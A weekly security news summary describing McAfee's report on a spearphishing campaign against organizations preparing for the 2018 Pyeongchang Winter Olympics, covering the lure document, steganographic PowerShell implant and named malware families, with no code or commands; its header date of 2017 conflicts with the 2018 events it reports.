Global Weekly Executive Summary, 09 FEB 2017

Spearphising the Olympics

A recent report by security software company McAfee reveals that unknown hackers launched a spearphishing campaign targeting organizations preparing for the 2018 Winter Olympics in Pyeongchang, South Korea.

The primary target were groups affiliated with ice hockey that worked to provide infrastructure or in some other supporting role, but the McAfee report continues, “The attackers appear to be casting a wide net with this campaign.

The first documented phishing email was sent on December 22, 2017, seven weeks before opening ceremonies, at a time when Olympics preparations were ongoing. The phishing emails were addressed to icehockey@pyeongchang2018.com with several organizations included in the BCC field. The email sender’s address was spoofed to  indicate that it came from the National Counter-Terrorism Center of South Korea, an organization that was conducting anti-terror drills in preparation for the Olympics at that time.

According to McAfee, the emails actually came from an IP address in Singapore. It was written in the Korean language and instructed readers to open a text document titled, “Organized by the Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics.” After opening the text file, a message written in English and repeated in Korean asks the user to “enable content to adjust this document to your version of Microsoft Word.”

The malware-infected document launches a PowerShell script when user clicks to “Enable Content.”  The PowerShell script “downloads and reads an image file from a remote location and carves out a hidden PowerShell implant script embedded with in the image file to execute.”  Steganography is used to hide the PowerShell script and is created using the open-source tool Invoke-PSImage. The purpose of the PowerShell implant is to establish communication with the attacker’s server and collect “basic system-level data.”

The McAfee report describes further implants used to gain persistence, gather data, and capture keystrokes. The implants are called Gold Dragon, Brave Prince, Ghost419, and RunningRAT. Gold Dragon and Brave Prince are Korean-language implants.

A notable detail in the McAfee report is that steganography was used in some cases. This is the second mention of the use of steganography in recent weeks. Last week, a Motherboard article detailed a custom-made encryption app called Muslim Crypt in the Middle East that allowed users to hide messages in an image file.

Ice hockey plays an important role for North and South Korean relations this Olympics. In January, the North and South Korean governments announced that they would host a joint women’s hockey team, the first team that combined athletes from both countries to appear at the Olympics. North and South Korean athletes marched in the Olympic Opening Ceremonies under a unified flag.

Sources: 

McAfee, Malicious Document Targets Pyeongchang Olympics

Motherboard, This Custom-Made Jihadi Encryption App Hides Messages in Images

New York Times, Olympics Open With Koreas Marching Together, Offering Hope for Peace